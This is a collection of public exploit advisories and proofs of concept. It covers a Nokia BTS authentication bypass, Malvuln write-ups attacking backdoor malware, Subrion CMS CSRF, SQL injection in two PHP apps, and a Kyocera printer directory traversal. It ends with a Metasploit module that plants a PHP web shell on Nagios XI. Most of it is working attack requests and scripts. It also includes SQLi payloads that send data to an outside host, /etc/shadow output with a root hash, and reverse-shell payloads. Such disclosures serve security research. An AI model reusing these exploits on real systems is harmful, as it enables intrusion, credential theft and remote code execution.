<pre><code> title: Nokia Transport Module Authentication Bypass<br /> case id: CM-2020-02<br /> product: BTS TRS web console (FTM_W20_FP2_2019.08.16_0010)<br /> vulnerability type: Authentication Bypass<br /> severity: Critical<br /> found: 2020-09-28<br /> CVE: CVE-2021-31932<br /> by: Cristiano Maruti (@cmaruti)<br /><br />[EXECUTIVE SUMMARY]<br /><br /> The TRS web console allows an authenticated user to remotely manage the BTS<br /> and its configuration. The analysis discovered an authentication bypass<br /> vulnerability (CWE-289) in the web management console. A malicious<br /> unauthenticated user can get access to all the functionalities exposed via<br /> the web panel circumventing the authentication process. The vulnerability<br /> lies in the way the web server in use (lighttpd) protects restricted<br /> resources and how special characters are encoded and pass to the underline<br /> CGIs. A successful attack can read data from the BTS and read, modify or<br /> delete BTS configuration.<br /><br />[VULNERABLE VERSIONS]<br /><br /> The following version of the TRS web console was affected by the<br /> vulnerability; previous versions may be vulnerable as well:<br /> - BTS TRS web console (FTM_W20_FP2_2019.08.16_0010)<br /><br />[TECHNICAL DETAILS]<br /><br />It is possible to reproduce the vulnerability following these steps:<br />1. Open a web browser and insert the BTS TRS web console IP<br />2. Navigate to a protected resource (for example<br />/protected/ShowErrorLog.cgi)<br />3. Subsitute the dot character with the corresponding URL encoded value<br />(%2e)<br />4. Resulting URL<br />(/protected/ShowErrorLog%2ecgi?token=thisIsNotTheRightToken)<br /> give access without prompt for any authentication credential<br /><br />Below a full transcript of the HTTP request used to get access to a<br />protected<br />resource.<br /><br />HTTP Request<br />-------------------------------------------------------------------------------<br />GET /protected/ShowErrorLog%2Ecgi?token=thisIsNotTheRightToken HTTP/1.1<br />Host: <targetip><br />User-Agent: curl/7.67.0<br />Accept: */*<br /><br />-------------------------------------------------------------------------------<br />cURL PoC<br />-------------------------------------------------------------------------------<br /># curl -vk https://<targetip>/protected/ShowErrorLog%2Ecgi?token=thisIsNotTheRightToken&frame=showLogFile<br /><br /><br />[VULNERABILITY REFERENCE]<br />Mitre assigned the following CVE ID to the vulnerability: CVE-2021-31932<br /><br />[DISCLOSURE TIMELINE]<br />2020-10-06: Contacting Nokia PSIRT and shared the details of the<br />vulnerability<br />2020-10-07: Nokia PSIRT acknowledge the receipt of the message.<br />2021-10-12: Vendor engineering team confirmed the vulnerability and working<br />on patch (estimated time end of 2020).<br />2021-04-30: Research requested a CVE assignment through MITRE CVE<br />Assignment Team; allocated CVE-2021-31932<br />2021-05-01: Researcher notified the assigned CVE number to the Vendor<br />2022-02-08: Researcher asked for permission to publicly release the report<br />to the public; Nokia PSIRT acknowledged<br />2022-02-10: Public release<br /><br /><br />-- <br /><br />Cristiano Maruti<br />about.me/cmaruti<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/fc8eaa2a5752b509dbd02989d8d9f2e2.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.FTP.Matiteman<br />Vulnerability: Weak Hardcoded Password<br />Description: The malware listens on TCP port 21, authentication is required for remote user access. However, the credentials "matiteman" are weak and hardcoded in plaintext within the executable.<br />Type: PE32<br />MD5: fc8eaa2a5752b509dbd02989d8d9f2e2<br />Vuln ID: MVID-2021-0425<br />Disclosure: 12/11/2021 <br /><br />Exploit/PoC:<br />nc64.exe 192.168.18.125 21<br />welcome to mtm ftp server<br />USER matiteman<br />331 Password required for matiteman.<br />PASS matiteman<br />230 User matiteman logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />CDUP<br />250 CWD command successful. "c:/" is current directory.<br />PASV<br />227 Entering Passive Mode (192,168,18,125,194,37).<br />STOR DOOM-SM.exe<br />150 Opening data connection for DOOM-SM.exe.<br />226 File received ok<br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.125"<br />PORT=49701<br />DOOM="DOOM-SM.exe"<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> f = open(DOOM, "rb")<br /> EXE = f.read()<br /> s.send(EXE)<br /><br /> while EXE:<br /> s.send(EXE)<br /> EXE=f.read()<br /> <br /> s.close()<br /><br /> print("By Malvuln");<br /><br />if __name__=="__main__":<br /> doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)<br /># Date: 2022-02-09<br /># Exploit Author: Aryan Chehreghani<br /># Vendor Homepage: https://subrion.org<br /># Software Link: https://subrion.org/download<br /># Version: 4.2.1<br /># Tested on: Windows 10<br /><br /># [ About - Subrion CMS ]: <br />#Subrion is a PHP/MySQL based CMS & framework,<br />#that allows you to build websites for any purpose,<br />#Yes, from blog to corporate mega portal.<br /><br /># [ Description ]:<br /># CSRF vulnerability was discovered in 4.2.1 version of Subrion CMS,<br /># With this vulnerability, authorized users can be added to the system.<br /><br /># [ Sample CSRF Request ]:<br /><br />POST /subrion/panel/members/add/ HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------386122140640094420852486902<br />Content-Length: 2522<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/subrion/panel/members/add/<br />Cookie: loader=loaded; INTELLI_ffd8ae8438=ftph4lgam8hugh8j0mgv8j4q2l<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="__st"<br /><br />YNXrr7MjSY0Qi0JYISJ7DRuC9Gd1zxPYwjHcFKVh<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="username"<br /><br />Aryan<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="fullname"<br /><br />AryanChehreghani<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="email"<br /><br />aryanchehreghani@yahoo.com<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="_password"<br /><br />Test1234!<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="_password2"<br /><br />Test1234!<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="usergroup_id"<br /><br />1<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="website"<br /><br /><br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="phone"<br /><br /><br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="biography"<br /><br /><br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="facebook"<br /><br /><br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="twitter"<br /><br /><br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="gplus"<br /><br /><br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="linkedin"<br /><br /><br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="email_language"<br /><br />en<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="sponsored"<br /><br />0<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="featured"<br /><br />0<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="featured_end"<br /><br />2022-03-09 12:03<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="status"<br /><br />active<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="save"<br /><br />1<br />-----------------------------386122140640094420852486902<br />Content-Disposition: form-data; name="goto"<br /><br />list<br />-----------------------------386122140640094420852486902--<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/8b484576f928c256277016104cc364c2_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.BackAttack.20<br />Vulnerability: Authentication Bypass RCE<br />Description: BackAtTack 2.0 By CurrenTChaoSGroup(CCG) by default listens on TCP ports 80 and 11131. The malware features a remote web interface where you can enable its FTP server. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands, this can result in remote code execution.<br />Type: PE32<br />MD5: 8b484576f928c256277016104cc364c2<br />Vuln ID: MVID-2021-0424<br />Disclosure: 12/11/2021<br /><br />Exploit/PoC:<br />nc64.exe 192.168.18.125 21<br />220 httP://www.CurrenTChaoS.Tk - BackAtTack2.0 ftp server-<br />USER malvuln<br />331 Password required for malvuln.<br />PASS malvuln<br />230 User malvuln logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />CDUP<br />250 CWD command successful. "C:/" is current directory.<br />PASV<br />227 Entering Passive Mode (192,168,18,125,194,33).<br />STOR DOOM-SM.exe<br />150 Opening data connection for DOOM-SM.exe.<br />226 File received ok<br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.125"<br />PORT=49697<br />DOOM="DOOM-SM.exe"<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> f = open(DOOM, "rb")<br /> EXE = f.read()<br /> s.send(EXE)<br /><br /> while EXE:<br /> s.send(EXE)<br /> EXE=f.read()<br /> <br /> s.close()<br /><br /> print("By Malvuln");<br /><br />if __name__=="__main__":<br /> doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated)<br /># Exploit Author: Alperen Ergel<br /># Contact: @alpernae (IG/TW)<br /># Software Homepage: https://www.sourcecodester.com/php/15155/accounting-journal-management-system-trial-balance-php-free-source-code.html<br /># Version : 1.0<br /># Tested on: windows 10 xammp | Kali linux<br /># Category: WebApp<br /># Google Dork: N/A<br /># Date: 09.02.2022<br /><br />######## Description ########<br />#<br /># <br /># Authenticate and get update user settings will be appear the<br /># id paramater put your payload at there it'll be work <br /># <br />#<br />#<br />######## Proof of Concept ########<br /><br />========>>> REQUEST <<<=========<br /><br />GET /ajms/admin/?page=user/manage_user&id=5%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=r513r6hug9aqofhlfs3bc7f7qa<br />Upgrade-Insecure-Requests: 1<br /><br /><br /></code></pre>
<pre><code>## [Simple Forum-Discussion System<br />1.0](https://www.sourcecodester.com/php/14525/simple-forumdiscussion-system-using-phpmysql-source-code.html)<br /><br />## [Vendor](https://www.sourcecodester.com/users/tips23)<br /><br />![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/Forum-Discussion-System-1.0/docs/forum.png)<br /><br />## Description:<br />Multiple SQL-Injections are found on Simple Forum-Discussion System<br />1.0 For example on three applications which are manage_topic.php,<br />manage_user.php, and ajax.php. The attacker can be retrieving all<br />information from the database of this system by using this<br />vulnerability.<br /><br /><br />[+]Payloads:<br /><br />```mysql<br />Parameter: id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=(select<br />load_file('\\\\c7kvyxxyc2i5yh8l3p6byhxtxk3drff6hu8hy5n.nu11secur1tyPenetrationTestingEngineer.net\\nix'))<br />AND (SELECT 4985 FROM (SELECT(SLEEP(5)))Eggb)<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 4 columns<br /> Payload: id=(select<br />load_file('\\\\c7kvyxxyc2i5yh8l3p6byhxtxk3drff6hu8hy5n.nu11secur1tyPenetrationTestingEngineer.net\\nix'))<br />UNION ALL SELECT<br />NULL,NULL,CONCAT(0x7162627871,0x564c7a5164475979514c4879487159576946726147756c7746504d696a5a6c6554547345776f4d61,0x716a7a7171),NULL,NULL,NULL--<br />-<br />```<br /><br /><br />```mysql<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: id=135628119 or 8604=08604 AND 5328=5328&mtype=own<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=135628119 or 8604=08604 AND (SELECT 6263 FROM<br />(SELECT(SLEEP(5)))lewZ)&mtype=own<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 5 columns<br /> Payload: id=-6332 UNION ALL SELECT<br />CONCAT(0x7176766b71,0x4b717847474f67485458796b544c50486c656e637779445a6c506b63756d564a544f665364557772,0x7171707871),NULL,NULL,NULL,NULL--<br />-&mtype=own<br />```<br /><br /><br />```mysql<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=GnxaCRMw'+(select<br />load_file('\\\\p2s8tasb7fditu3yy21otus6sxyqmjg77av2is6h.nu11secur1tyPenetrationTestingEngineer.net\\fnu'))+''<br />AND (SELECT 1271 FROM (SELECT(SLEEP(5)))MBvz) AND<br />'eIbF'='eIbF&password=t4F!v8o!H8<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Forum-Discussion-System-1.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/439w8c)<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) <br /># Author: Luis Martinez<br /># Discovery Date: 2022-02-10<br /># Vendor Homepage: https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html<br /># Tested Version: ECOSYS M2035dn<br /># Tested on: Linux<br /># Vulnerability Type: Directory Traversal File Disclosure (Unauthenticated)<br /><br /># Proof of Concept:<br /># 1.- Create a directory traversal payload<br /># 2.- Add nullbyte to the end of the payload(%00)<br /># 3.- Sent your request<br /><br />Request 1:<br /><br />GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1<br />Cookie: rtl=0<br />Host: X.X.X.X<br />Connection: Keep-alive<br />Accept-Encoding: gzip,deflate<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)<br />Accept: */*<br /><br />Response 1:<br /><br />HTTP/1.1 200 OK<br />Content-Length: 844<br />Upgrade: TLS/1.0<br />Accept-Encoding: identity<br />Date: Thu, 10 Feb 2022 15:55:57 GMT<br />Server: KM-MFP-http/V0.0.1<br />Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT<br />ETag: "/js/../../../../../../../../etc/passwd, Thu, 10 Feb 2022 15:25:48 GMT"<br />Content-Type: image/jpeg<br /><br />root:x:0:0:root:/root:/bin/sh<br />bin:x:1:1:bin:/bin:/bin/sh<br />daemon:x:2:2:daemon:/usr/sbin:/bin/sh<br />sys:x:3:3:sys:/dev:/bin/sh<br />adm:x:4:4:adm:/var/adm:/bin/sh<br />lp:x:5:7:lp:/var/spool/lpd:/bin/sh<br />sync:x:6:8:sync:/bin:/bin/sync<br />shutdown:x:7:9:shutdown:/sbin:/sbin/shutdown<br />halt:x:8:10:halt:/sbin:/sbin/halt<br />mail:x:9:11:mail:/var/mail:/bin/sh<br />news:x:10:12:news:/var/spool/news:/bin/sh<br />uucp:x:11:13:uucp:/var/spool/uucp:/bin/sh<br />operator:x:12:0:operator:/root:/bin/sh<br />games:x:13:60:games:/usr/games:/bin/sh<br />ftp:x:15:14:ftp:/var/ftp:/bin/sh<br />man:x:16:20:man:/var/cache/man:/bin/sh<br />www:x:17:18:www-data:/var/www:/bin/sh<br />sshd:x:18:19:sshd:/var/run/sshd:/bin/sh<br />proxy:x:19:21:proxy:/bin:/bin/sh<br />telnetd:x:20:22:proxy:/bin:/bin/sh<br />backup:x:34:34:backup:/var/backups:/bin/sh<br />ais:x:101:101:ais:/var/run/ais:/bin/sh<br />nobody:x:65534:65534:nobody:/nonexistent:/bin/sh<br /><br />Request 2:<br /><br />GET /js/../../../../../../../../etc/shadow%00.jpg HTTP/1.1<br />Cookie: rtl=0<br />Host: X.X.X.X<br />Connection: Keep-alive<br />Accept-Encoding: gzip,deflate<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)<br />Accept: */*<br /><br />Response 2:<br /><br />HTTP/1.1 200 OK<br />Content-Length: 480<br />Upgrade: TLS/1.0<br />Accept-Encoding: identity<br />Date: Thu, 10 Feb 2022 16:10:16 GMT<br />Server: KM-MFP-http/V0.0.1<br />Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT<br />ETag: "/js/../../../../../../../../etc/shadow, Thu, 10 Feb 2022 15:25:48 GMT"<br />Content-Type: image/jpeg<br /><br />root:$1$7NzW9Q4N$hXTtMygKjVUdJtW86EH3t1:15873::::::<br />bin:*:15873::::::<br />daemon:*:15873::::::<br />sys:*:15873::::::<br />adm:*:15873::::::<br />lp:*:15873::::::<br />sync:*:15873::::::<br />shutdown:*:15873::::::<br />halt:*:15873::::::<br />mail:*:15873::::::<br />news:*:15873::::::<br />uucp:*:15873::::::<br />operator:*:15873::::::<br />games:*:15873::::::<br />ftp:*:15873::::::<br />man:*:15873::::::<br />www:*:15873::::::<br />sshd:*:15873::::::<br />proxy:*:15873::::::<br />telnetd:*:15873::::::<br />backup:*:15873::::::<br />ais:*:15873::::::<br />nobody:*:15873::::::<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/8b484576f928c256277016104cc364c2.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.BackAttack.20<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: BackAtTack 2.0 By CurrenTChaoSGroup(CCG) by default listens on TCP ports 80 and 11131. The malware features a remote web interface where you can control an infected host. Third party-attackers who can reach the system can run commands made available by the malware E.g. take screenshot, restart the system, enable FTP or even destroy the backdoor etc. The web UI does not require authentication to execute these commands.<br />Type: PE32<br />MD5: 8b484576f928c256277016104cc364c2<br />Vuln ID: MVID-2021-0423<br />Disclosure: 12/11/2021<br /><br />Exploit/PoC:<br />Show Skeleton<br />http://x.x.x.x/showskeleton<br /><br />Show Sex<br />http://x.x.x.x/showsex<br /><br />Whos logged on<br />curl http://x.x.x.x/whoisthere <br /><br />Screen capture<br />curl http://x.x.x.x/capturescreen<br /><br />Enable FTP<br />curl http://x.x.x.x/ftpon <br /><br />Restart host<br />curl http://x.x.x.x/restart <br /><br />Destroy the backdoor<br />curl http://x.x.x.x/destroyyes -v<br /><br />Destroy action has been executed! -Restart procedure initiated also-<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HTTP::NagiosXi<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Nagios XI Autodiscovery Webshell Upload',<br /> 'Description' => %q{<br /> This module exploits a path traversal issue in Nagios XI before version 5.8.5 (CVE-2021-37343).<br /> The path traversal allows a remote and authenticated administrator to upload a PHP web shell<br /> and execute code as `www-data`. The module achieves this by creating an autodiscovery job<br /> with an `id` field containing a path traversal to a writable and remotely accessible directory,<br /> and `custom_ports` field containing the web shell. A cron file will be created using the chosen<br /> path and file name, and the web shell is embedded in the file.<br /><br /> After the web shell has been written to the victim, this module will then use the web shell to<br /> establish a Meterpreter session or a reverse shell. By default, the web shell is deleted by<br /> the module, and the autodiscovery job is removed as well.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Claroty Team82', # vulnerability discovery<br /> 'jbaines-r7' # metasploit module<br /> ],<br /> 'References' => [<br /> ['CVE', '2021-37343'],<br /> ['URL', 'https://claroty.com/2021/09/21/blog-research-securing-network-management-systems-nagios-xi/']<br /> ],<br /> 'DisclosureDate' => '2021-07-15',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_openssl'<br /> },<br /> 'Payload' => {<br /> 'Append' => ' & disown'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'printf' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 1,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'MeterpreterTryToFork' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options [<br /> OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),<br /> OptString.new('PASSWORD', [true, 'Password to authenticate with', nil]),<br /> OptInt.new('DEPTH', [true, 'The depth of the path traversal', 10]),<br /> OptString.new('WEBSHELL_NAME', [false, 'The name of the uploaded webshell. This value is random if left unset', nil]),<br /> OptBool.new('DELETE_WEBSHELL', [true, 'Indicates if the webshell should be deleted or not.', true])<br /> ]<br /><br /> @webshell_uri = '/includes/components/highcharts/exporting-server/temp/'<br /> @webshell_path = '/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/'<br /> end<br /><br /> # Authenticate and grab the version from the dashboard. Store auth cookies for later user.<br /> def check<br /> login_result, res_array = nagios_xi_login(datastore['USERNAME'], datastore['PASSWORD'], false)<br /> case login_result<br /> when 1..3 # An error occurred<br /> return CheckCode::Unknown(res_array[0])<br /> when 4<br /> return CheckCode::Detected('Nagios is not fully installed.')<br /> when 5<br /> return CheckCode::Detected('The Nagios license has not been signed.')<br /> end<br /><br /> # res_array[1] cannot be nil since the mixin checks for that already.<br /> @auth_cookies = res_array[1]<br /><br /> nagios_version = nagios_xi_version(res_array[0])<br /> if nagios_version.nil?<br /> return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')<br /> end<br /><br /> # affected versions are 5.2.0 -> 5.8.4<br /> if Rex::Version.new(nagios_version) < Rex::Version.new('5.8.5') &&<br /> Rex::Version.new(nagios_version) >= Rex::Version.new('5.2.0')<br /> return CheckCode::Appears("Determined using the self-reported version: #{nagios_version}")<br /> end<br /><br /> CheckCode::Safe("Determined using the self-reported version: #{nagios_version}")<br /> end<br /><br /> # Using the path traversal, upload a php webshell to the remote target<br /> def drop_webshell<br /> autodisc_uri = normalize_uri(target_uri.path, '/includes/components/autodiscovery/')<br /> print_status("Attempting to grab a CSRF token from #{autodisc_uri}")<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => autodisc_uri,<br /> 'cookie' => @auth_cookies,<br /> 'vars_get' => {<br /> 'mode' => 'newjob'<br /> }<br /> })<br /><br /> fail_with(Failure::Disconnected, 'Connection failed') unless res<br /> fail_with(Failure::UnexpectedReply, "Unexpected HTTP status code #{res.code}") unless res.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected HTTP body') unless res.body.include?('<title>New Auto-Discovery Job')<br /><br /> # snag the nsp token from the response<br /> nsp = get_nsp(res)<br /> fail_with(Failure::Unknown, 'Failed to obtain the nsp token which is required to upload the web shell') if nsp.blank?<br /><br /> # drop a basic web shell on the server<br /> webshell_location = normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}")<br /> print_status("Uploading webshell to #{webshell_location}")<br /> php_webshell = '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'<br /> payload = 'update=1&' \<br /> "job=#{'../' * datastore['DEPTH']}#{@webshell_path}#{@webshell_name}&" \<br /> "nsp=#{nsp}&" \<br /> 'address=127.0.0.1%2F0&' \<br /> 'frequency=Yearly&' \<br /> "custom_ports=#{php_webshell}&"<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => autodisc_uri,<br /> 'cookie' => @auth_cookies,<br /> 'vars_get' => {<br /> 'mode' => 'newjob'<br /> },<br /> 'data' => payload<br /> })<br /><br /> fail_with(Failure::Disconnected, 'Connection failed') unless res<br /> fail_with(Failure::UnexpectedReply, "Unexpected HTTP status code #{res.code}") unless res.code == 302<br /><br /> # Test the web shell installed by echoing a random string and ensure it appears in the res.body<br /> print_status('Testing if web shell installation was successful')<br /> rand_data = Rex::Text.rand_text_alphanumeric(16..32)<br /> res = execute_via_webshell("echo #{rand_data}")<br /> fail_with(Failure::UnexpectedReply, 'Web shell execution did not appear to succeed.') unless res.body.include?(rand_data)<br /> print_good("Web shell installed at #{webshell_location}")<br /><br /> # This is a great place to leave a web shell for persistence since it doesn't require auth<br /> # to touch it. By default, we'll clean this up but the attacker has to option to leave it<br /> if datastore['DELETE_WEBSHELL']<br /> register_file_for_cleanup("#{@webshell_path}#{@webshell_name}")<br /> end<br /> end<br /><br /> # Successful exploitation creates a new job in the autodiscovery view. This function deletes<br /> # the job that there is no evidence of exploitation in the UI.<br /> def cleanup_job<br /> print_status('Deleting autodiscovery job')<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/includes/components/autodiscovery/'),<br /> 'cookie' => @auth_cookies,<br /> 'vars_get' => {<br /> 'mode' => 'deletejob',<br /> 'job' => "#{'../' * datastore['DEPTH']}#{@webshell_path}#{@webshell_name}"<br /> }<br /> })<br /><br /> fail_with(Failure::Disconnected, 'Connection failed') unless res<br /> fail_with(Failure::UnexpectedReply, "Unexpected HTTP status code #{res.code}") unless res&.code == 302<br /> end<br /><br /> # Executes commands via the uploaded webshell<br /> def execute_via_webshell(cmd)<br /> cmd = Rex::Text.uri_encode(cmd)<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, "/includes/components/highcharts/exporting-server/temp/#{@webshell_name}?cmd=#{cmd}")<br /> })<br /><br /> fail_with(Failure::Disconnected, 'Connection failed') unless res<br /> fail_with(Failure::UnexpectedReply, "Unexpected HTTP status code #{res.code}") unless res.code == 200<br /> res<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> execute_via_webshell(cmd)<br /> end<br /><br /> def exploit<br /> # create a randomish web shell name if the user doesn't specify one<br /> @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(5..12)}.php"<br /><br /> drop_webshell<br /><br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> ensure<br /> cleanup_job<br /> end<br />end<br /></code></pre>
